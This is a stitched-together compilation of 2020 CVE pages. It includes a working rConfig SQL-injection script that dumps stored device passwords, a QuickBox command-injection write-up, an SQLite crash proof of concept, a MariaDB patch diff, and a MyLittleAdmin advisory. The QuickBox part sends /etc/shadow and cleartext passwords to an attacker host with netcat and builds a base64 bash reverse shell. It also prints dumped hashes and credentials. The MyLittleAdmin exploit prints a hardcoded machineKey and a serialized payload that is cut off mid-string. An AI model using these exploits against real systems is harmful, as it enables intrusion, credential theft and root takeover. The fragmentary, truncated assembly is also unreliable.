rConfig 3.9.4 and previous versions has unauthenticated snippets.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.

Permalink

Cannot retrieve contributors at this time

#!/usr/bin/python3

\# CVE-2020-10549

\# author https://github.com/theguly/

#

\# this method is very similar to one already published by v1k1ngfr for his CVE-2020-10220 (https://github.com/v1k1ngfr/exploits-rconfig)

\# as he published, because of PDO DB Class SNAFU, you could also stack two queries having a plain INSERT and achieve auth bypass by creating a new user

#

\# i wanted to have different py script foreach CVE, to have a proper listing on github.

\# i'd prefer a all-in-one script with proper align for the different union arguments, but i expect i won't use this script anymore so i'll deal with it.

#

\# tested with rConfig < 3.9.6

import sys

import requests

import urllib3

urllib3.disable\_warnings(urllib3.exceptions.InsecureRequestWarning)

burl \= """/snippets.inc.php?search=True&searchField=antani'+%s&searchColumn=snippetName&searchOption=contains"""

ulen \= 4

if len(sys.argv) < 2:

print('use: ./{} target'.format(sys.argv\[0\]))

print('./{} https://1.2.3.4/'.format(sys.argv\[0\]))

sys.exit()

url \= sys.argv\[1\] + burl

s \= requests.Session()

s.verify \= False

def getInfo(purl):

r \= s.get(purl)

if '\[PWN\]' in str(r.text):

ret \= str(r.text).split('\[PWN\]')\[1\]

return ret

else:

return False

def askContinue(msg):

c \= input('\[-\] '+msg+' (Y/n)')

if 'n' in c.lower():

sys.exit()

\# find current db name

print("\[+\] extracting rconfig db: ",end\='')

payload \= "union+select+(select+concat(0x223E3C42523E5B50574E5D,database(),0x5B50574E5D3C42523E)+limit+0,1)"+",NULL" \* (ulen \- 1) +"+--+"

purl \= url % payload

dbname \= getInfo(purl)

print(dbname)

\# dump all devices ip,username,password,enablepass

print("\[+\] dumping nodes: ")

print('devicename:ip:username:password:enablepass')

print('------------------------------------------')

i\=0

while True:

if i \> 0 and not i % 10:

askContinue('Continue?')

payload \="union+all+select+(select+concat(0x223E3C42523E5B50574E5D,deviceName,0x3A,deviceIpAddr,0x3A,deviceUsername,0x3A,devicePassword,0x3A,deviceEnablePassword,0x5B50574E5D3C42523E)+FROM+"+dbname+".nodes+limit+"+str(i)+","+str(i+1)+")"+",NULL" \* (ulen \- 1)+"+--+"

purl \= url % payload

n \= getInfo(purl)

if not n:

askContinue('it could be possible that we don\\'t have more devices. continue?')

print(n)

i \= i + 1

sys.exit()

CVE-2020-10549: exploits/CVE-2020-10549.py at master · theguly/exploits

Apache Ignite uses H2 database to build SQL distributed execution engine. H2 provides SQL functions which could be used by attacker to access to a filesystem.

**Email display mode:**

Modern rendering  
Legacy rendering

CVE-2020-1963

QuickBox Community Edition through 2.5.5 and Pro Edition through 2.1.8 allows an authenticated remote attacker to execute code on the server via command injection in the servicestart parameter.

**Impact**

QuickBox CE <= v2.5.5 and QuickBox Pro <= 2.1.8 are both affected by an authenticated remote code execution (RCE) (_CVE-2020-13448_) and privilege escalation vulnerabilities (_CVE-2020-13694_ and _CVE-2020-13695_).  
A low-privileged user can execute arbitary commands on the server with the privileges of the user running the web server, and in turn escalate privileges to root by abusing weak sudo rules.

**What is QuickBox?**

QuickBox is a complete media server application and services management system, with a simplistic approach to achieving easy application installation and management from a beautifully designed dashboard, allowing users the ability to interact with their media server on a professional grade level.

**Versions affected**

*   QuickBox CE v2.5.5 and prior
*   QuickBox Pro v2.1.8 and prior

**Vulnerability**

Since this CVE covers two separate "versions" of QuickBox, with almost identical vulnerabilities, I have split the post into two parts; one for QuickBox CE and one for QuickBox Pro.

The vulnerability is located in the file `/inc/config.php`. This file is mainly used to setup configuration parameters to be used later by the application. At the end of this file we see that it also accept a GET parameter which will be used, unsanitized, in a call to `shell_exec`, leading to a command injection vulnerability.

Below is a snippet of the vulnerable code from`config.php`:

    switch (intval($_GET['id'])) {
    /* restart services */
    case 88:
      $process = $_GET['servicestart'];
        if ($process == "resilio-sync"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "shellinabox"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "emby-server"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "headphones"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "lidarr"){
          shell_exec("sudo systemctl stop $process");
          shell_exec("sudo systemctl disable $process");
        } elseif ($process == "nzbget"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "plexmediaserver"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "Tautulli"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "ombi"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "radarr"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "subsonic"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "transmission-daemon"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "qbittorrent"){
          shell_exec("sudo systemctl enable $process@$username");
          shell_exec("sudo systemctl restart $process@$username");
        } else {
          shell_exec("sudo systemctl restart $process@$username");
        }

Since we can control both `$_GET['id']` and `$_GET['servicestart']` we can inject our own commands into the last call to`shell_exec` and achieve remote code execution.

The complete vulnerable file can be found here: https://github.com/QuickBox/QB/blob/6f4253d82ccfdc85641fa6b27712569890687482/dashboard/inc/config.php

**Exploit**

Exploiting this vulnerability is pretty straight forward.

By sending a GET request to the following URL: `https://<QUICKBOX-CE-IP-ADDRESS>/inc/config.php?id=88&servicestart=a;<COMMAND-HERE>;` the command is executed on the server as the www-data user.

**Dump /etc/shadow**

Upon further analysis we found that the www-data user can run quite a few commands and programs as root using sudo - _without a password_.  
One of the commands that can be executed is `grep`.  
But since the output of the command executed by `shell_exec`isn't displayed on the website, we won't see any output when trying to exfiltrate sensitive information.

One way to get a around this limitation is to use grep to write the contents of `/etc/shadow` to a file we can read from and use netcat to send the file back to our listener.

If we setup a netcat listener and visit the following URL we can trigger the exploit and receive the output of `/etc/shadow`:  
`https://<QUICKBOX-CE-IP-ADDRESS>/inc/config.php?id=88&servicestart=a;sudo+grep+.+/etc/shadow+>pwds;nc+<OUR-IP-ADDRESS>+9001+<+pwds;rm+pwds;`

    s1gh@kali~$: nc -lvnp 9001
    listening on [any] 9001 ...
    connect to [192.168.1.126] from (UNKNOWN) [192.168.1.250] 58814
    root:$6$lYAppqO4$ParMSRU7IDtSULWHfA4sy8iQCm9/nJP.RksoLau0zBHp0VPbOfYBipZlcQ8VVvnvArRC37r3y/hBLgYRDZ5:18406:0:99999:7:::
    daemon:*:17920:0:99999:7:::
    bin:*:17920:0:99999:7:::
    sys:*:17920:0:99999:7:::
    sync:*:17920:0:99999:7:::
    games:*:17920:0:99999:7:::
    man:*:17920:0:99999:7:::
    lp:*:17920:0:99999:7:::
    mail:*:17920:0:99999:7:::
    news:*:17920:0:99999:7:::
    uucp:*:17920:0:99999:7:::
    proxy:*:17920:0:99999:7:::
    www-data:*:17920:0:99999:7:::
    backup:*:17920:0:99999:7:::
    list:*:17920:0:99999:7:::
    irc:*:17920:0:99999:7:::
    gnats:*:17920:0:99999:7:::
    nobody:*:17920:0:99999:7:::
    systemd-timesync:*:17920:0:99999:7:::
    systemd-network:*:17920:0:99999:7:::
    systemd-resolve:*:17920:0:99999:7:::
    systemd-bus-proxy:*:17920:0:99999:7:::
    syslog:*:17920:0:99999:7:::
    _apt:*:17920:0:99999:7:::
    postfix:*:17920:0:99999:7:::
    sshd:*:17920:0:99999:7:::
    uuidd:*:17920:0:99999:7:::
    messagebus:*:17920:0:99999:7:::
    s1gh:$6$hf2vF79G$APAqRRKp4Jax27xzZE1npHlumLWaDsgaHo3z/Sw6Z3tEnemam9h.EB1pXFx1Jy9mZ/jqaQoTBlL7TphlAZb210:18406:0:99999:7:::
    memcache:!:18406:0:99999:7:::
    vnstat:*:18406:0:99999:7:::
    debian-deluged:*:18406:0:99999:7:::
    ftp:*:18406:0:99999:7:::
    shellinabox:*:18406:0:99999:7:::
    test:$6$qPhsfmxz$Jm529ZLBiigWAhcRO3svLm4HLRFZsYgkWso0dTa2d6Bxb8UJd6LuCI1AVaOutXVheu2Z2iWugRQFQLeZGCecp.:18406:0:99999:7:::
    s1gh2:$6$zaGzrHfj$1Qgs5AWlruq2YJpPFs6TjO2QNtd.WpiAV7WMV9aQE1nJKAC1LdYTh/52/HkvBeYkBhzob/E1q6JwJp6zKGRHx.:18406:0:99999:7:::
    

**Privilege escalation**

Investigating further we found that the cleartext password of every QuickBox CE user is stored in \*.db files in `/root`.  
Since we can run `grep` as root we can dump all admin and non-admin passwords, and exfiltrate the passwords in the same way we did with `/etc/shadow`. This in turn gives us a way to escalate our privileges to that of the admin user. And since the admin user can `sudo su` without a password, we can now gain root access.

To trigger the exploit, setup a netcat listener and visit the following URL:  
`https://<QUICKBOX-CE-IP-ADDRESS>/inc/config.php?id=88&servicestart=a;sudo+grep+-R+.+/root/+--include="*.info">pwds;nc+<OUR-IP-ADDRESS>+9001<pwds;`

    s1gh@kali~$: nc -lvnp 9001
    listening on [any] 9001 ...
    connect to [192.168.1.126] from (UNKNOWN) [192.168.1.250] 59136
    /root/s1gh2.info:s1gh2 : Password1234 
    /root/s1gh2.info:1GB
    /root/information.info:  Seedbox can be found at https://s1gh:Password1234@192.168.1.250 (Also works for FTP:5757/SSH:4747)
    /root/information.info:  If you need to restart rtorrent/irssi, you can type 'reload'
    /root/information.info:  https://s1gh:Password1234@192.168.1.250 (Also works for FTP:5757/SSH:4747)
    /root/test.info:test : test 
    /root/test.info:1GB
    /root/s1gh.info:#   https://s1gh:Password1234@192.168.1.250 (Also works for FTP:5757/SSH:4747)

The information.info file will contain the admin user credentials. In this case: `https://_s1gh_:_Password1234_@192.168.1.250 (Also works for FTP:5757/SSH:4747)`

With these credentials we can now ssh into the server and escalate our privileges to the root user.

    s1gh@kali~$: ssh s1gh@192.168.1.250 -p 4747
    s1gh@192.168.1.250's password: 
    Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 5.3.18-3-pve x86_64)
    
     * Documentation:  https://help.ubuntu.com
     * Management:     https://landscape.canonical.com
     * Support:        https://ubuntu.com/advantage
    
    
    2 packages can be updated.
    0 updates are security updates.
    
    New release '18.04.4 LTS' available.
    Run 'do-release-upgrade' to upgrade to it.
    
    Last login: Sun May 24 20:53:02 2020 from 192.168.1.126
     Welcome Back !
        * Dashboard:  https://192.168.1.250
        * Support:    https://plaza.quickbox.io
        * Donate:     https://quickbox.io/donate
    
    [s1gh@Ubuntu1604]:(0b)~$ sudo su
    
    
    |========================================================================|
    |------------------------------------------------------------------------|
    |  ###################   This Server is OFF limits   ####################|
    |------------------------------------------------------------------------|
         You are running QuickBox v2.5.5
         Your logged IP is 192.168.1.126:0.0
         Your BASH version is 4.3
         Mon May 25 21:16:30 UTC 2020
    |========================================================================|
    
    
    Ubuntu1604:/home/s1gh# whoami;id
    root
    uid=0(root) gid=0(root) groups=0(root)

**QuickBox Pro**

Due to a partially shared code base between CE and Pro, exactly the same command injection vulnerability can be found in the Pro version.  
The only difference is that `/inc/config.php` no longer exist and part of the source code is encrypted, so we had to manually find the injection point.

After a while we found the injection point in `index.php`.  
The exact same parameters as with the CE version can be abused to achieve RCE.

**Exploit**

By sending a GET request to the following URL: `https://<QUICKBOX-PRO-IP-ADDRESS>/index.php?id=88&servicestart=a;<COMMAND-HERE>;` the command is executed on the server as the www-data user.

**Privilege Escalation**

Since the www-data user can execute `sudo mysql` without a password, we can modify our GET request in such a way that we get a reverse shell as root instantly instead of first getting a shell as the www-data user and then doing the privilege escalation.

Our reverse shell will have a few "bad characters", so first we create a base64 encoded string of the following reverse shell: `bash -i >& /dev/tcp/<YOUR-IP>/<YOUR-PORT> 0>&1`

    s1gh@kali~$: echo -n "sudo mysql -e '\! /bin/bash -c \"bash -i >& /dev/tcp/192.168.1.126/9001 0>&1\"'" | base64
    c3VkbyBteXNxbCAtZSAnXCEgL2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMS4xMjYvOTAwMSAwPiYxIic=

Now that we have the base64 encoded reverse shell, we can visit the following url in order to trigger the exploit (_remember to first setup a netcat listener on your chosen port_):

`https://<QUICKBOX-PRO-IP-ADDRESS>?id=88&servicestart=a;echo+<BASE64-ENCODED-STRING>|base64+-d|bash;`

    s1gh@kali~$: nc -lvnp 9001
    listening on [any] 9001 ...
    connect to [192.168.1.126] from (UNKNOWN) [192.168.1.250] 46862                 
    bash: cannot set terminal process group (135): Inappropriate ioctl for device   
    bash: no job control in this shell                        
    
    
    |========================================================================|                                           
    |------------------------------------------------------------------------|                                           
    |  ###################   This Server is OFF limits   ####################|                                           
    |------------------------------------------------------------------------|                                           
         You are running QuickBox v2.5.5                      
         Your logged IP is :0.0                               
         Your BASH version is 4.4                             
         Fri May 29 07:30:25 UTC 2020                         
    |========================================================================|                                           
    
    
    
    
    |========================================================================|                                           
    |------------------------------------------------------------------------|                                           
    |  ###################   This Server is OFF limits   ####################|                                           
    |------------------------------------------------------------------------|                                           
         You are running QuickBox v2.1.8                      
         Your logged IP is :0.0                               
         Your BASH version is 4.4                             
         Fri May 29 07:30:26 UTC 2020                         
    |========================================================================|                                           
    |========================================================================|                                           
    |------------------------------------------------------------------------|                                           
    |  Just type any one of the following commands                           |                                           
    |  to turn on different bash prompts                                     |                                           
    |------------------------------------------------------------------------|                                           
    |  commandprompt_on                                                      |                                           
    |  this prompt shows last command used & more                            |                                           
    |  powerprompt_on (default)                                              |                                           
    |  this prompt shows colorful system data - cpu, load etc.               |                                           
    |  basicprompt_on                                                        |                                           
    |  this prompt shows color coded load & cpu avg                          |                                           
    |  prompt_OFF                                                            |                                           
    |  this turns off prompts and goes back to default                       |                                           
    |========================================================================|                                           
    
    
    380/2048MB      0.99 1.35 1.60 1/817 6682                 
    [21016:21015 0:37] 07:30:26 Fri May 29 [root@QB-PRO] /srv/quickbox                                                   
    (2:37)# whoami;id                                         
    whoami;id
    root
    uid=0(root) gid=0(root) groups=0(root)

**References**

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13448
*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13694
*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13695
*   https://www.exploit-db.com/exploits/48536
*   https://github.com/s1gh/QuickBox-CE-2.5.5-Authenticated-RCE

CVE-2020-13448: CVE-2020-13448 - QuickBox -  Authenticated RCE/Privilege Escalation

ext/fts3/fts3_snippet.c in SQLite before 3.32.0 has a NULL pointer dereference via a crafted matchinfo() query.

About Monorail User Guide Release Notes Feedback on Monorail Terms Privacy

CVE-2020-13632: 1080459 - chromium - An open-source project to help move the web forward.

SQLite through 3.32.0 has an integer overflow in sqlite3_str_vappendf in printf.c.

2020-05-23

20:03

• Fixed ticket \[23439ea5\]: _Stack overflow in sqlite3\_str\_vappendf, caused by int overflow_ plus 7 other changes (artifact: 126aa8d4 user: drh)

19:58

Limit the "precision" of floating-point to text conversions in the printf() function to 100,000,000. Fix for ticket \[23439ea582241138\]. (check-in: d08d3405 user: drh tags: trunk)

17:52

• New ticket \[23439ea5\] _Stack overflow in sqlite3\_str\_vappendf, caused by int overflow_. (artifact: e6eaff95 user: yongheng)

Ticket Hash:

23439ea5822411389c8edac234c08f2cc27ef3e9

Title:

Stack overflow in sqlite3\_str\_vappendf, caused by int overflow

Status:

Fixed

Type:

Code\_Defect

Severity:

Important

Priority:

Low

Subsystem:

Utilities

Resolution:

Fixed

Last Modified:

2020-05-23 20:03:59

Version Found In:

User Comments:

yongheng added on 2020-05-23 17:52:02:

Affected latest release version. 

POC:
---
CREATE TABLE a(b DOUBLE CHECK( NOT CASE WHEN printf(b, b) THEN 0 END) UNIQUE ON CONFLICT REPLACE);
CREATE TRIGGER c INSERT ON a BEGIN INSERT INTO a SELECT group\_concat(b, 2147483647) FROM a;END;
INSERT INTO a(b, b, b) VALUES(NULL, 9, 3);
UPDATE a SET b = 0;
INSERT INTO a VALUES('GERMANY''s%'), ('Y'), ('Brand#23')
---

drh added on 2020-05-23 20:03:59:

Simplified test case:

> SELECT printf('%.\*g',2147483647,0.01);

Affects all versions of SQLite since printf() was introduced in version 3.8.3 (2014-02-03).

CVE-2020-13434: SQLite: View Ticket

libmariadb/mariadb_lib.c in MariaDB Connector/C before 3.1.8 does not properly validate the content of an OK packet received from a server. NOTE: although mariadb_lib.c was originally based on code shipped for MySQL, this issue does not affect any MySQL components supported by Oracle.

@@ -81,6 +81,8 @@ #define ASYNC\_CONTEXT\_DEFAULT\_STACK\_SIZE (4096\*15) #define MA\_RPL\_VERSION\_HACK "5.5.5-"  
#define CHARSET\_NAME\_LEN 64  
#undef max\_allowed\_packet #undef net\_buffer\_length extern ulong max\_allowed\_packet; /\* net.c \*/ @@ -2139,17 +2141,22 @@ mysql\_send\_query(MYSQL\* mysql, const char\* query, unsigned long length)  
int ma\_read\_ok\_packet(MYSQL \*mysql, uchar \*pos, ulong length) { uchar \*end= mysql->net.read\_pos+length; size\_t item\_len; mysql->affected\_rows\= net\_field\_length\_ll(&pos); mysql->insert\_id\= net\_field\_length\_ll(&pos); mysql->server\_status\=uint2korr(pos); pos+=2; mysql->warning\_count\=uint2korr(pos); pos+=2; if (pos < mysql->net.read\_pos+length) if (pos > end) goto corrupted; if (pos < end) { if ((item\_len= net\_field\_length(&pos))) mysql->info\=(char\*) pos; if (pos + item\_len > end) goto corrupted;  
/\* check if server supports session tracking \*/ if (mysql->server\_capabilities & CLIENT\_SESSION\_TRACKING) @@ -2160,23 +2167,26 @@ int ma\_read\_ok\_packet(MYSQL \*mysql, uchar \*pos, ulong length) if (mysql->server\_status & SERVER\_SESSION\_STATE\_CHANGED) { int i; if (pos < mysql->net.read\_pos + length) if (pos < end) { LIST \*session\_item; MYSQL\_LEX\_STRING \*str= NULL; enum enum\_session\_state\_type si\_type; uchar \*old\_pos= pos; size\_t item\_len= net\_field\_length(&pos); /\* length for all items \*/  
item\_len= net\_field\_length(&pos); /\* length for all items \*/ if (pos + item\_len > end) goto corrupted; end= pos + item\_len;  
/\* length was already set, so make sure that info will be zero terminated \*/ if (mysql->info) \*old\_pos= 0;  
while (item\_len > 0) while (pos < end) { size\_t plen; char \*data; old\_pos= pos; si\_type= (enum enum\_session\_state\_type)net\_field\_length(&pos); switch(si\_type) { case SESSION\_TRACK\_SCHEMA: @@ -2186,16 +2196,14 @@ int ma\_read\_ok\_packet(MYSQL \*mysql, uchar \*pos, ulong length) if (si\_type != SESSION\_TRACK\_STATE\_CHANGE) net\_field\_length(&pos); /\* ignore total length, item length will follow next \*/ plen= net\_field\_length(&pos); if (pos + plen > end) goto corrupted; if (!(session\_item= ma\_multi\_malloc(0, &session\_item, sizeof(LIST), &str, sizeof(MYSQL\_LEX\_STRING), &data, plen, NULL))) { ma\_clear\_session\_state(mysql); SET\_CLIENT\_ERROR(mysql, CR\_OUT\_OF\_MEMORY, SQLSTATE\_UNKNOWN, 0); return -1; } goto oom; str->length\= plen; str->str\= data; memcpy(str->str, (char \*)pos, plen); @@ -2218,41 +2226,40 @@ int ma\_read\_ok\_packet(MYSQL \*mysql, uchar \*pos, ulong length) if (!strncmp(str->str, "character\_set\_client", str->length)) set\_charset= 1; plen= net\_field\_length(&pos); if (pos + plen > end) goto corrupted; if (!(session\_item= ma\_multi\_malloc(0, &session\_item, sizeof(LIST), &str, sizeof(MYSQL\_LEX\_STRING), &data, plen, NULL))) { ma\_clear\_session\_state(mysql); SET\_CLIENT\_ERROR(mysql, CR\_OUT\_OF\_MEMORY, SQLSTATE\_UNKNOWN, 0); return -1; } goto oom; str->length\= plen; str->str\= data; memcpy(str->str, (char \*)pos, plen); pos+= plen; session\_item->data\= str; mysql->extension\->session\_state\[si\_type\].list\= list\_add(mysql->extension\->session\_state\[si\_type\].list, session\_item); if (set\_charset && if (set\_charset && str->length < CHARSET\_NAME\_LEN && strncmp(mysql->charset\->csname, str->str, str->length) != 0) { char cs\_name\[64\]; MARIADB\_CHARSET\_INFO \*cs\_info; char cs\_name\[CHARSET\_NAME\_LEN\]; const MARIADB\_CHARSET\_INFO \*cs\_info; memcpy(cs\_name, str->str, str->length); cs\_name\[str->length\]= 0; if ((cs\_info = (MARIADB\_CHARSET\_INFO \*)mysql\_find\_charset\_name(cs\_name))) if ((cs\_info = mysql\_find\_charset\_name(cs\_name))) mysql->charset\= cs\_info; } } break; default: /\* not supported yet \*/ plen= net\_field\_length(&pos); if (pos + plen > end) goto corrupted; pos+= plen; break; } item\_len-= (pos - old\_pos); } } for (i= SESSION\_TRACK\_BEGIN; i <= SESSION\_TRACK\_END; i++) @@ -2267,6 +2274,16 @@ int ma\_read\_ok\_packet(MYSQL \*mysql, uchar \*pos, ulong length) else if (mysql->server\_capabilities & CLIENT\_SESSION\_TRACKING) ma\_clear\_session\_state(mysql); return(0);  
oom: ma\_clear\_session\_state(mysql); SET\_CLIENT\_ERROR(mysql, CR\_OUT\_OF\_MEMORY, SQLSTATE\_UNKNOWN, 0); return -1;  
corrupted: ma\_clear\_session\_state(mysql); SET\_CLIENT\_ERROR(mysql, CR\_MALFORMED\_PACKET, SQLSTATE\_UNKNOWN, 0); return -1; }  
int mthd\_my\_read\_query\_result(MYSQL \*mysql)

CVE-2020-13249: sanity checks for client-supplied OK packet content · mariadb-corporation/mariadb-connector-c@2759b87

The management tool in MyLittleAdmin 3.8 allows remote attackers to execute arbitrary code because machineKey is hardcoded (the same for all customers' installations) in web.config, and can be used to send serialized ASP code.

**TL;DR**

Find out how we managed to execute arbitrary commands on MyLittleAdmin management tool using unauthenticated RCE vulnerability. 

**Vulnerability Summary**

MyLittleAdmin is a web-based management tool specially designed for MS SQL Server. It fully works with MS SQL Server. While the product appears to be discontinued (no new releases since 2013) it is still being offered on the company web site as well as part of the optional installation of Plesk. Furthermore, there are numerous active installations present on the Internet. An unauthenticated RCE vulnerability in the product allows remote attackers to execute arbitrary commands within the context of the IIS application engine.

**CVE**

CVE-2020-13166

**Credit**

An independent Security Researcher has reported this vulnerability to SSD Secure Disclosure program.

**Affected Systems**

MyLittleAdmin version 3.8, we suspect older versions are also affected but have no way to verify it.

**Vendor Response**

Numerous attempts to contact the vendor went unanswered, attempts to email sales@ and support@ as well as the twitter account apparently has not reached anyone as we have not received any response.

**Workaround**

The following workaround was provided to us by Tim Aplin from @Umbrellar:

Go into IIS > Machine Keys > Generate new Key > Apply
Run: IISreset

**Vulnerability Details**

MyLittleAdmin utilizes a hardcoded _machineKey_ for all installations, this value is kept in the file: _C:\\Program Files (x86)\\MyLittleAdmin\\web.config_

An attacker having this knowledge can then serialize objects that will be parsed by the ASP code used by the server as if it were MyLittleAdmin’s serialized object. This allow an attacker to execute commands on the remote server.

**Vulnerable Key**

The following is the hardcoded key used by MyLittleAdmin, by inserting its values to _ysoserial.exe_ it is possible to create a payload that will execute a command of our choice:

<machineKey
validationKey="5C7EEF6650639D2CB8FAA0DA36AF24452DCF69065F2EDC2
C8F2F44C0220BE2E5889CA01A207FC5FCE62D1A5A4F6D2410722261E6A33
E77E0628B17AA928039BF" decryptionKey="DC47E74EA278F789D2FF0E412AD840A89C10171F408D8AC4" validation="SHA1" />

**Demo**

![](https://ssd-disclosure.com/wp-content/uploads/2020/05/mylittleadmin-2-2.gif)

Have the skills to find similar vulnerabilities? We’re on the lookout for Server Management Tool researchers to submit their finding, receive very generous rewards and join our team. Click below for more information:

**Exploit**

The provided exploit code will connect to a remote server and send a payload that starts a _calc.exe_ in the context of IIS Application Engine

#!/usr/bin/python3
import requests
import sys
import logging

from bs4 import BeautifulSoup

# These two lines enable debugging at httplib level (requests->urllib3->http.client)
# You will see the REQUEST, including HEADERS and DATA, and RESPONSE with HEADERS but without DATA.
# The only thing missing will be the response.body which is not logged.
try:
    import http.client as http\_client
except ImportError:
    # Python 2
    import httplib as http\_client

http\_client.HTTPConnection.debuglevel = 0

# You must initialize logging, otherwise you'll not see debug output.
logging.basicConfig()
logging.getLogger().setLevel(logging.DEBUG)
requests\_log = logging.getLogger("requests.packages.urllib3")
requests\_log.setLevel(logging.DEBUG)
requests\_log.propagate = True

print("Connecting to remote server and collecting ASP state and event values")
r = requests.get('http://10.0.0.38')

soup = BeautifulSoup(r.text, 'html.parser')
# print(soup.prettify())

\_\_VIEWSTATEGENERATOR = ""
\_\_EVENTVALIDATION = ""
ServerName = ""

for input in soup.find\_all('input'):
  if input\['id'\] == '\_\_VIEWSTATEGENERATOR':
    \_\_VIEWSTATEGENERATOR = input\['value'\]
  if input\['id'\] == '\_\_EVENTVALIDATION':
    \_\_EVENTVALIDATION = input\['value'\]
  if input\['name'\] == 'fServerName$cControl':
    ServerName = input\['value'\]

# print("\_\_VIEWSTATEGENERATOR: {}\\n\_\_EVENTVALIDATION: {}\\nServerName: {}".format(\_\_VIEWSTATEGENERATOR, \_\_EVENTVALIDATION, ServerName))

shellcode = "/wEyxBEAAQAAAP////8BAAAAAAAAAAwCAAAASVN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuU29ydGVkU2V0YDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAVDb3VudAhDb21wYXJlcgdWZXJzaW9uBUl0ZW1zAAMABgiNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQgCAAAAAgAAAAkDAAAAAgAAAAkEAAAABAMAAACNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQEAAAALX2NvbXBhcmlzb24DIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIJBQAAABEEAAAAAgAAAAYGAAAACy9jIGNhbGMuZXhlBgcAAAADY21kBAUAAAAiU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcgMAAAAIRGVsZWdhdGUHbWV0aG9kMAdtZXRob2QxAwMDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeS9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlci9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkIAAAACQkAAAAJCgAAAAQIAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BgsAAACwAlN5c3RlbS5GdW5jYDNbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLCBTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GDAAAAEttc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkKBg0AAABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQYOAAAAGlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzBg8AAAAFU3RhcnQJEAAAAAQJAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVy